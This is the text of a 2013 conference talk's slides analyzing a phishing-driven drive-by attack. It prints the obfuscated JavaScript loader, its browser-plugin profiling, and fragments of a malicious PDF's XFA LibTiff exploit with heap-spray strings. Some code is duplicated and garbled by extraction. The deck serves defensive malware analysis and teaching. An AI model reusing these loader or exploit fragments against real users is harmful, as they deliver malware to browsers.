Slides to accompany my talk given to TASK.to on 25th Sept 2013. I discuss tracking an attempted
Analyzing Phishing & Malware Attacks For
Neither Fun Nor Profit
Lee Brotherston
@leEb_public
Obligatory “where I work” slide
Introduction
• What is meant by Malware & Phishing?
• Responding with Malware & Phishing?
• Case study + bonus tangents
• Questions
Malware Response Steps
During:
• Assess if attack was successful
• Assess impact to users/network
• Contain & Remediate
Afterwards:
• Examine what worked
• Examine what failed
• Improve processes, procedures & tools
Anatomy of a phish
Attacker sends
phishing emails
Target (user) clicks on one of the links
Redirects & Obfuscation
Harvest information
Drop Malware
Bad Things!!
The “real” phishing site
Tangent #1 – Stanley Milgram
Case Study - Email
Case Study – OPSEC
• Virtualised Environments (are not a panacea)
• No, not a real browser….. No.
• wget, curl, nslookup, socat & telnet are your friends
(--user-agent=“…” is also your friend)
Case Study - Redirection
curl --dump-header header.txt
--user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
hxxp://xn--80ahaobzXXXXXXX.XX--XXXX/
Case Study - Redirection
<html><title>Redirecting to ACH details, please wait.....</title>
<script type="text/javascript"><!--location.replace("hxxp://EVILMALWARESITE.COM/ensure/bulletin-isolate.php");
//--></script><noscript><meta http-equiv="refresh" content="0; url=hxxp://EVILMALWARESITE.COM/ensure/bulletin-isolate.php">
</noscript>
Case Study – EvilMalwareSite.com
<body><i></i><b>
59,96,111,111,107,100,115,31,118,104,99,115,103,60,33,48,33,31,103,100,104,102,103,115,60,33,48,33,61,59,111,96,113,96,108,3159,96,111,111,107,100,115,31,118,104,99,115,103,60,33,48,33,31,103,100,104,102,103,115,60,33,48,33,61,59,111,96,113,96,108,31,109,96,108,100,60,33,105,109,107,111,94,103,113,100,101,33,31,117,96,107,116,100,60,33,103,115,115,111,57,46,46,102,116,109,96,108,100,60,33,105,109,107,111,94,103,113,100,101,33,31,117,96,107,116,100,60,33,103,115,115,111,57,46,46,102,116,107,107,104,117,100,113,106,104,99,114,45,98,110,108,46,100,109,114,116,113,100,46,97,116,107,107,100,115,104,109,44,10,107,107,104,117,100,113,106,104,99,114,45,98,110,108,46,100,109,114,116,113,100,46,97,116,107,107,100,115,104,109,44,104,114,110,107,96,115,100,45,111,103,111,62,105,109,107,111,60,54,99,101,101,50,98,49,100,49,49,33,46,61,59,79,64,81,64,74,114,110,107,96,115,100,45,111,103,111,62,105,109,107,111,60,54,99,101,101,50,98,49,100,49,49,33,46,61,59,79,64,81,64,76,31,109,96,108,100,60,33,105,109,107,111,94,100,108,97,100,99,99,100,99,33,31,117,96,107,116,100,60,33,79,67,56,51,97,86,31,109,96,108,100,60,33,105,109,107,111,94,100,108,97,100,99,99,100,99,33,31,117,96,107,116,100,60,33,79,67,56,51,97,86,118,102,99,108,85,120,98,49,107,117,97,105,47,104,76,82,51,118,72,104,65,107,97,108,77,117,89,70,107,116,89,121,47,1046,118,102,99,108,85,120,98,49,107,117,97,105,47,104,76,82,51,118,72,104,65,107,97,108,77,117,89,70,107,116,89,121,47,104,99,87,81,108,75,83,102,104,79,121,51,102,67,80,110,55,96,108,52,114,98,66,65,121,98,70,85,105,79,82,72,119,75,105,64,10,99,87,81,108,75,83,102,104,79,121,51,102,67,80,110,55,96,108,52,114,98,66,65,121,98,70,85,105,79,82,72,119,75,105,64,104,72,71,103,115,97,70,52,121,78,108,111,108,100,67,47,104,96,71,81,47,98,67,110,117,75,49,111,103,99,108,69,108,100,66,54,72,71,103,115,97,70,52,121,78,108,111,108,100,67,47,104,96,71,81,47,98,67,110,117,75,49,111,103,99,108,69,108,100,66,52,105,97,49,47,104,79,104,64,77,66,105,119,111,97,108,89,117,98,108,48
,103,99,70,107,117,97,105,51,102,67,80,110,55,99,72,105,97,49,47,104,79,104,64,77,66,105,119,111,97,108,89,117,98,108,48,103,99,70,107,117,97,105,51,102,67,80,110,55,99,70,107,47,97,70,84,42,82,106,52,76,84,67,118,117,99,70,107,47,97,70,84,42,72,64,47,74,79,71,89,107,97,108,81,117,98,105,50,107,47,97,70,84,42,82,106,52,76,84,67,118,117,99,70,107,47,97,70,84,42,72,64,47,74,79,71,89,107,97,108,81,117,98,105,52,74,83,106,119,80,79,66,56,49,89,86,52,106,97,50,72,42,72,64,47,74,79,70,81,107,98,49,77,120,96,87,65,47,96,86,56,116,72,74,83,106,119,80,79,66,56,49,89,86,52,106,97,50,72,42,72,64,47,74,79,70,81,107,98,49,77,120,96,87,65,47,96,86,56,116,79,106,111,78,83,69,64,55,75,49,81,107,98,49,77,120,96,87,65,47,96,86,56,116,79,104,64,77,66,105,119,117,89,108,89,114,969,106,111,78,83,69,64,55,75,49,81,107,98,49,77,120,96,87,65,47,96,86,56,116,79,104,64,77,66,105,119,117,89,108,89,114,96,86,52,107,75,86,69,114,97,70,56,50,89,86,80,117,79,104,64,77,66,105,118,117,96,86,52,108,97,50,73,115,88,87,81,111,97,4,86,52,107,75,86,69,114,97,70,56,50,89,86,80,117,79,104,64,77,66,105,118,117,96,86,52,108,97,50,73,115,88,87,81,111,97,49,51,42,72,64,47,74,79,71,73,107,98,49,56,48,98,108,77,107,98,121,51,102,67,80,110,73,79,70,110,120,98,49,84,102,99,108,9,51,42,72,64,47,74,79,71,73,107,98,49,56,48,98,108,77,107,98,121,51,102,67,80,110,73,79,70,110,120,98,49,84,102,99,108,85,120,98,49,107,117,97,105,47,104,76,82,51,49,74,120,72,102,96,71,73,107,89,105,47,104,96,71,81,47,98,67,110,117,75,49,85,120,98,49,107,117,97,105,47,104,76,82,51,49,74,120,72,102,96,71,73,107,89,105,47,104,96,71,81,47,98,67,110,117,75,49,111,103,99,108,68,116,98,50,85,116,75,108,77,117,97,82,56,118,98,108,56,106,99,86,77,47,98,120,56,103,99,87,81,117,89,70111,103,99,108,68,116,98,50,85,116,75,108,77,117,97,82,56,118,98,108,56,106,99,86,77,47,98,120,56,103,99,87,81,117,89,70,118,117,96,105,73,121,89,82,72,117,79,104,64,77,66,102,106,55,96,108,69,120,72,70,103,120,89,86,88,56,72,104,56,107,97,,118,117,96,105,73,121,89,82,7
2,117,79,104,64,77,66,102,106,55,96,108,69,120,72,70,103,120,89,86,88,56,72,104,56,107,97,109,77,48,98,108,84,117,88,109,85,114,97,70,85,47,96,86,51,115,96,87,77,117,97,70,69,47,89,82,52,118,96,71,64,46,99,87,7109,77,48,98,108,84,117,88,109,85,114,97,70,85,47,96,86,51,115,96,87,77,117,97,70,69,47,89,82,52,118,96,71,64,46,99,87,77,103,79,86,77,106,96,87,69,108,88,109,72,108,99,108,69,49,79,86,89,106,89,71,77,114,98,71,103,111,72,104,65,115,88,86,17,103,79,86,77,106,96,87,69,108,88,109,72,108,99,108,69,49,79,86,89,106,89,71,77,114,98,71,103,111,72,104,65,115,88,86,107,116,79,82,73,47,98,109,85,107,72,104,55,42,72,64,47,74,79,66,56,120,89,87,77,117,99,87,73,105,89,87,76,42,72,64,47,7407,116,79,82,73,47,98,109,85,107,72,104,55,42,72,64,47,74,79,66,56,120,89,87,77,117,99,87,73,105,89,87,76,42,72,64,47,74,79,70,69,118,98,70,119,107,99,66,48,106,89,87,77,105,72,70,52,103,97,86,84,56,72,106,81,107,97,86,55,102,80,87,65,118,9,79,70,69,118,98,70,119,107,99,66,48,106,89,87,77,105,72,70,52,103,97,86,84,56,72,106,81,107,97,86,55,102,80,87,65,118,97,70,85,47,72,104,65,115,88,86,107,116,75,86,77,114,88,87,77,121,79,82,73,50,96,66,72,102,99,49,107,106,99,70,102,56,72,7,70,85,47,72,104,65,115,88,86,107,116,75,86,77,114,88,87,77,121,79,82,73,50,96,66,72,102,99,49,107,106,99,70,102,56,72,105,68,104,72,70,103,107,96,86,99,110,99,67,47,104,76,82,72,42,67,80,110,102,79,71,65,103,98,108,69,115,72,70,52,103,97,105,68,104,72,70,103,107,96,86,99,110,99,67,47,104,76,82,72,42,67,80,110,102,79,71,65,103,98,108,69,115,72,70,52,103,97,86,84,56,72,107,56,101,88,87,65,118,97,70,85,47,87,50,77,121,99,107,56,49,88,86,119,111,89,70,69,47,89,86,80,104,72,71,886,84,56,72,107,56,101,88,87,65,118,97,70,85,47,87,50,77,121,99,107,56,49,88,86,119,111,89,70,69,47,89,86,80,104,72,71,89,103,97,71,85,107,79,82,73,47,98,109,85,107,72,105,51,55,75,50,65,103,98,108,69,115,79,104,64,77,66,104,64,55,98,70,69,9,103,97,71,85,107,79,82,73,47,98,109,85,107,72,105,51,55,75,50,65,103,98,108,69,115,79,104,64,77,66,104,64,55
,98,70,69,120,88,86,47,102,97,108,69,115,89,83,47,104,99,108,69,114,72,104,65,49,88,86,119,48,89,83,47,104,81,71,107,52,76,47,56,1120,88,86,47,102,97,108,69,115,89,83,47,104,99,108,69,114,72,104,65,49,88,86,119,48,89,83,47,104,81,71,107,52,76,47,56,112,96,106,69,75,75,82,47,51,99,108,85,114,98,83,103,77,96,87,98,107,99,67,65,112,89,86,56,111,82,49,119,107,96,105,56,7512,96,106,69,75,75,82,47,51,99,108,85,114,98,83,103,77,96,87,98,107,99,67,65,112,89,86,56,111,82,49,119,107,96,105,56,75,75,82,48,107,100,83,103,117,72,105,51,55,75,50,65,103,98,108,69,115,79,102,47,74,72,67,119,118,88,87,73,103,97,82,65,11,75,82,48,107,100,83,103,117,72,105,51,55,75,50,65,103,98,108,69,115,79,102,47,74,72,67,119,118,88,87,73,103,97,82,65,116,88,86,48,107,79,82,73,118,98,108,107,115,89,82,72,102,99,108,69,114,99,86,84,56,72,108,47,51,96,87,80,115,85,109,107,16,88,86,48,107,79,82,73,118,98,108,107,115,89,82,72,102,99,108,69,114,99,86,84,56,72,108,47,51,96,87,80,115,85,109,107,107,99,121,77,68,76,50,103,49,75,108,72,49,75,84,55,49,80,84,56,110,87,47,55,119,89,106,55,119,76,85,73,65,89,86,72,49,7607,99,121,77,68,76,50,103,49,75,108,72,49,75,84,55,49,80,84,56,110,87,47,55,119,89,106,55,119,76,85,73,65,89,86,72,49,76,68,55,119,77,106,55,119,76,84,55,119,76,84,55,49,78,68,55,119,89,106,55,49,81,68,55,119,96,68,55,49,81,68,55,49,81,69,7,68,55,119,77,106,55,119,76,84,55,119,76,84,55,49,78,68,55,119,89,106,55,49,81,68,55,119,96,68,55,49,81,68,55,49,81,69,73,52,88,105,88,116,84,105,76,118,88,107,77,82,98,85,56,104,76,120,72,42,79,66,56,118,88,87,73,103,97,83,51,77,66,105,1183,52,88,105,88,116,84,105,76,118,88,107,77,82,98,85,56,104,76,120,72,42,79,66,56,118,88,87,73,103,97,83,51,77,66,105,118,117,88,87,65,118,97,70,85,47,75,86,81,107,98,49,76,42,72,64,47,74,79,71,85,118,89,70,69,47,89,82,65,105,96,70,85,105,96,117,88,87,65,118,97,70,85,47,75,86,81,107,98,49,76,42,72,64,47,74,79,71,85,118,89,70,69,47,89,82,65,105,96,70,85,105,96,121,47,104,88,108,69,105,96,49,99,120,97,50,85,116,89,66,72,117,79,10
2,47,74,79,66,56,112,97,108,119,118,79,102,60,60,3,121,47,104,88,108,69,105,96,49,99,120,97,50,85,116,89,66,72,117,79,102,47,74,79,66,56,112,97,108,119,118,79,102,60,60,33,46,61,59,111,96,113,96,108,31,109,96,108,100,60,33,111,113,104,108,100,33,31,117,96,107,116,100,60,33,108,55,104,115,43,46,61,59,111,96,113,96,108,31,109,96,108,100,60,33,111,113,104,108,100,33,31,117,96,107,116,100,60,33,108,55,104,115,44,85,120,100,118,50,67,50,119,117,45,97,53,44,78,53,64,78,103,94,78,48,101,78,48,48,81,64,100,97,53,47,78,48,53,78,48,484,85,120,100,118,50,67,50,119,117,45,97,53,44,78,53,64,78,103,94,78,48,101,78,48,48,81,64,100,97,53,47,78,48,53,78,48,48,78,48,48,78,53,55,78,48,101,78,53,67,78,48,103,78,53,67,78,53,67,81,120,97,53,45,81,50,47,97,82,81,112,94,97,50,33,61,5,78,48,48,78,53,55,78,48,101,78,53,67,78,48,103,78,53,67,78,53,67,81,120,97,53,45,81,50,47,97,82,81,112,94,97,50,33,61,59,46,111,96,113,96,108,61,59,111,96,113,96,108,31,117,96,107,116,100,60,33,67,120,120,50,78,105,105,64,74,44,44,55,117,19,46,111,96,113,96,108,61,59,111,96,113,96,108,31,117,96,107,116,100,60,33,67,120,120,50,78,105,105,64,74,44,44,55,117,100,107,112,55,76,104,118,36,115,47,105,100,110,104,74,107,100,105,62,74,44,44,100,120,55,110,33,31,109,96,108,100,60,33,00,107,112,55,76,104,118,36,115,47,105,100,110,104,74,107,100,105,62,74,44,44,100,120,55,110,33,31,109,96,108,100,60,33,37,34,47,47,48,48,55,58,96,107,33,46,61,59,46,96,111,111,107,100,115,6137,34,47,47,48,48,55,58,96,107,33,46,61,59,46,96,111,111,107,100,115,61
</b>
<script><script>try{document.body--}catch(dv32r3){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"]try{document.body--}catch(dv32r3){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"]
(",");for(j=0;a["length"]>j;j++)(",");for(j=0;a["length"]>j;j++){a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].ap{a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].appendChild(d);d["innerHTML"]=a;}pendChild(d);d["innerHTML"]=a;}
Tangent #2 - Obfuscation
<script>document.write('Hello World');
</script>
Tangent #2 - Obfuscation
<script>document.write('Hel'+''+'lo Wo'+''+'rld');
</script>
Tangent #2 - Obfuscation
<script>var naughty =
"document.write('Hel'+'lo Wo'+'rld');";eval(naughty);
</script>
Tangent #2 - Obfuscation
<script>var encodedNaughty =
"646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";
var naughty ='';
for (var i = 0; i < encodedNaughty.length; i += 2) naughty +=
String.fromCharCode(parseInt(encodedNaughty.substr(i, 2), 16));
eval(naughty);</script>
Tangent #2 - Obfuscation
<script>var a = "646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";
var aa ='';
for (var aaa = 0; aaa < a.length; aaa += 2) aa +=
String.fromCharCode(parseInt(a.substr(aaa, 2), 16));
eval(aa);</script>
Tangent #2 - Obfuscation
<script>var a =
"646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";
z=eval;
var aa ='';
for (var aaa = 0; aaa < a.length; aaa += 2) aa += String.fromCharCode(parseInt(a.substr(aaa, 2), 16));
z(aa);</script>
Tangent #2 - Obfuscation
<script>var a="646f63756d656e742e7772697465282748656c272b276c6f20576f272b27726c6427293b";z=eval;var aa='';for (var aaa=0;aaa<a.length;aaa+= 2)aa+=String.fromCharCode(parseInt(a.substr(aaa,2),16));z(aa);</script>
====
<script>document.write('Hello World');
</script>
Deobfuscating Example - Revelo
Deobfuscating GK - Revelo
What Happened?
Case StudyCase Study<script><script>try{document.body--}catch(dv32r3)try{document.body--}catch(dv32r3)
{a=document[("getEl"+"ementsByTagName")]("b"){a=document[("getEl"+"ementsByTagName")]("b")[0].innerHTML["split"](",");for(j=0;a["length"]>j;j++)[0].innerHTML["split"](",");for(j=0;a["length"]>j;j++){a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(Strin{a[j]=1+0x1*a[j];}ff="f";a=String[ff+"romCharCode"].apply(String,a);d=document.createElement("span");document["body"].appendChg,a);d=document.createElement("span");document["body"].appendChild(d);d["innerHTML"]=a;}ild(d);d["innerHTML"]=a;}
</script></script>
<script><script>z=eval;ss=String;function vq(){for(i=0;i<a.length;i++)z=eval;ss=String;function vq(){for(i=0;i<a.length;i++)
{if(az)zz();}}gg=("getEl"+"ementsByTagName");function zzz(){if(az)zz();}}gg=("getEl"+"ementsByTagName");function zzz(){dd=document;try{dd.body-=12}catch(xq){a=dd[gg]{dd=document;try{dd.body-=12}catch(xq){a=dd[gg]("div");a=a[0].innerHTML;}a=a.split(".");}nul="0"+"x";function ("div");a=a[0].innerHTML;}a=a.split(".");}nul="0"+"x";function zz(){s+=(ss.fromCharCode((-35-2)+z(nul+a[i])));}zz(){s+=(ss.fromCharCode((-35-2)+z(nul+a[i])));}
</script></script>
<script><script>s="";s="";zzz();zzz();az=1;try{caewbtew=~2;}catch(vava){az=0;}az=1;try{caewbtew=~2;}catch(vava){az=0;}vq();vq();u=z;uu=s;u=z;uu=s;if(az)u(uu);if(az)u(uu);</script></script>
Case StudyCase Study<script><script> try {try { document.body--document.body-- } catch (dv32r3) {} catch (dv32r3) { a = documenta = document[("getEl" + "ementsByTagName")][("getEl" + "ementsByTagName")]("b")("b")
[0].innerHTML["split"](",");[0].innerHTML["split"](","); for (j = 0; a["length"] > j; j++) {for (j = 0; a["length"] > j; j++) { a[j] = 1 + 0x1 * a[j];a[j] = 1 + 0x1 * a[j]; }} ff = "f";ff = "f"; a = String[ff + "romCharCode"a = String[ff + "romCharCode"].apply(String, a);].apply(String, a); d = document.createElement("span");d = document.createElement("span"); document["body"].appendChild(d);document["body"].appendChild(d); d["innerHTML"] = a;d["innerHTML"] = a; }}
z = eval;z = eval; ss = String;ss = String;
function vq() {function vq() { . . . . . . . . . . . . . . . . . .
Case Study – Quick & Dirty Deobfuscate…
z = eval;
u = z;
if (az) u(uu);
u = eval   uu = decoded script
if(az) document.write('<code>'+uu+'</code>');
Et Voila!Et Voila!pdpd={version:"0.7.9",name:"pdpd",pdpd={version:"0.7.9",name:"pdpd",handler:function(c,b,a){return handler:function(c,b,a){return function()function(){c(b,a)}},openTag:"<",isDefined:{c(b,a)}},openTag:"<",isDefined:function(b){return typeof b!function(b){return typeof b!="undefined"},isArray:function(b="undefined"},isArray:function(b){return(/array/i).test(Object.p){return(/array/i).test(Object.prototype.toString.call(b))},isFurototype.toString.call(b))},isFunc:function(b)nc:function(b)
. . . . . .. . . . . .
Edited Highlights
flash: { mimeType: "application/x-shockwave-flash",
progID: "ShockwaveFlash.ShockwaveFlash", classID: "clsid:D27CDB6E-AE6D-11CF-96B8-444553540000",
getVersion: function () {
adobereader: { mimeType: "application/pdf",
java: { mimeType: ["application/x-java-applet", "application/x-java-vm", "application/x-java-bean"],
Socat - the quick (cheats) way
$ socat TCP4-LISTEN:8080 –
GET http://EVILMALWARESITE.COM/ensure/bulletin-isolate.php?jnlp=7dff3c2e22 HTTP/1.1
accept-encoding: gzip
Host: evilmalwaresite.com
Cache-Control: no-cache
Pragma: no-cache
User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_21
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Proxy-Connection: keep-alive
Case Study – Summary so far
• Redirects
• Obtains obfuscated script
• De-obfuscates script
• Profiles the browser (which browser, ActiveX, Flash, Java, MediaPlayer plugins, Acrobat Reader, etc)
• Collects versions & configuration of the plugins
• Rewrites the current page
• Embeds the payload (PDF)
Case Study – AntiVirus
Case Study – Payload
• VirusTotal
– LibTiff Integer Overflow
– PDF:Exploit.PDF-JS.AAH
– PDF/Blacole-FHJ!811825B7A717
– Exploit:Win32/CVE-2010-0188
Case Study – Payload
• Malware Tracker:
– 111.0@4334: suspicious.javascript in XFA block
– 111.0@4334: suspicious.warning: object contains JavaScript
• Let’s extract the XFA block
MalwareScanner - XFA
XFA Block – here we go again!
<script contentType='application/x-<script contentType='application/x-javascript'>javascript'>
if(this.execInitialize()===null)if(ImageFielif(this.execInitialize()===null)if(ImageField1.ZZA(321,513613,"a")===0)d1.ZZA(321,513613,"a")===0){x='eI';zz="y";z=event.target;}{x='eI';zz="y";z=event.target;}
xs="\x65";xs="\x65";
dd="Co"+"de";dd="Co"+"de";
ddd="ar";ddd="ar";
s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@";s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@";
xx=s[2].concat('a',"l");xx=s[2].concat('a',"l");
XFA Block - Obfuscation
s=caca="ntvtdhfePJxTmlNo#hFpx!ZeA*yvv#@";
String["fr"['cString["fr"['c'+''+'oo'+"'+"nca"+s[3]]…nca"+s[3]]…
String["fr"['conca'+s[3]]…
String["fr"['concat']…
XFA Block – Obfuscation
function ZZA(){return 2-2;}
sq=z[xs+xx]   xs="\x65"; xx=s[2].concat('a',"l");
sq=eval;
Hex “e”
s[2] = “v”
XFA Block - Obfuscation
if(this.execInitialize()===null)if(ImageField1.ZZA(321,513613,"a")===0){x='eI';zz="y";z=event.target;}
====
if(1){x='eI';zz="y";z=event.target;}
Or
if(0){x='eI';zz="y";z=event.target;}
XFA Block – Just Won’t Run
z=event.target; <- Makes IE Barf
. == .
z=event.target;
XFA Block - Obfuscation
a=[ZA(('7'),06),ZA(('6'),01),ZA(('7'),02),ZAa=[ZA(('7'),06),ZA(('6'),01),ZA(('7'),02),ZA(('2'),00),ZA(('7'),00),ZA(('6'),01),ZA(('(('2'),00),ZA(('7'),00),ZA(('6'),01),ZA(('6'),04),ZA(('6'),04),ZA(('6'),011)6'),04),ZA(('6'),04),ZA(('6'),011)…………
function ZA(a,b) {function ZA(a,b) {
a+=b;a+=b;
sq=z[xs+xx]("\x70ar"+"s"+x+s[0]+s[1]);sq=z[xs+xx]("\x70ar"+"s"+x+s[0]+s[1]);
return sq(a,16);return sq(a,16);
}}
Let’s try some guesswork
function ZA(a,b){
a+=b;document.write(String.fromCharCode(parseInt(a, 16)));
}
ZA(('7'),06) ZA(('6'),01) ZA(('7'),02) ZA(('2'),00) ZA(('7'),00) ZA(('6'),01) ZA(('6'),04) ZA(('6'),04) ZA((‘6’),011) ZA((‘6’),E) ZA((‘6’),7)
Hex 76 == ‘v’  Hex 61 == ‘a’  Hex 72 == ‘r’  Hex 20 == Space  Hex 70 == ‘p’  Hex 61 == ‘a’  Hex 64 == ‘d’  Hex 64 == ‘d’  ????  Hex 6E == ‘n’  Hex 67 == ‘g’
‘i’ == Hex 69
Octal 011 == Hex 9
That seemed to work! (mostly)
var padding;var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var pointers_a, i;var x = new Array();var x = new Array();var y = new Array();var y = new Array();var _l1 = var _l1 =
"4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a414141"4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a41414141260000000000000000000000000000001239804a6420600f000400004141441260000000000000000000000000000001239804a6420600f000400004141414141414141" + ".split('').reverse().join('').replace(/;/g, 14141414141" + ".split('').reverse().join('').replace(/;/g, '');'');
_l3 = app;_l3 = app;_l4 = new Array();_l4 = new Array();
function _l5() {function _l5() { var _l6 = _l3.viewerVersion.toString();var _l6 = _l3.viewerVersion.toString(); _l6 = _l6.replace('.', '');_l6 = _l6.replace('.', ''); while (_l6.length < 4) _l6 += '0';while (_l6.length < 4) _l6 += '0'; return parseInt(_l6, 10)return parseInt(_l6, 10)}}
function _l7(_l8, _l9) {function _l7(_l8, _l9) { while (_l8.length * 2 < _l9) _l8 += _l8;while (_l8.length * 2 < _l9) _l8 += _l8; return _l8.substring(0, _l9 / 2)return _l8.substring(0, _l9 / 2)……..
Exploit Code – Observations
• No real obfuscation
• No fake functions, variables or other distractions.
• Nearly all string manipulation.
Exploit - Samples
var padding;
var pointers_a, i;
loxWhee = _I1 + spray;
ImageField1.rawValue = _ll1
Case Study – Payload
• Uses a LibTiff Overflow
• Executes arbitrary code, which…
• Downloads and executes a .dll of the attacker's choice…
Game Over
Tangent #3 – Game Over?
Source: XKCD
Case Study – 2 weeks later…
A breach timeline
Source: Verizon 2013 Data Breach Information Report
Is this isolated?
But do people actually click?
Source: Verizon 2013 Data Breach Information Report
The “best” Phish
Resources
Socat: http://www.dest-unreach.org/socat/
VirusTotal: http://www.virustotal.com/
Revelo: http://www.kahusecurity.com/
Malzilla: http://malzilla.sourceforge.net/
curl/wget: Your local package management tool Malware Tracker: http://malwaretracker.com/
Javascript Beautifier: http://jsbeautifier.org/
Javascript Unpack: http://jsunpack.jeek.org DBIR: http://www.verizonenterprise.com/DBIR/2013/
Thank you for your time.
Any Questions?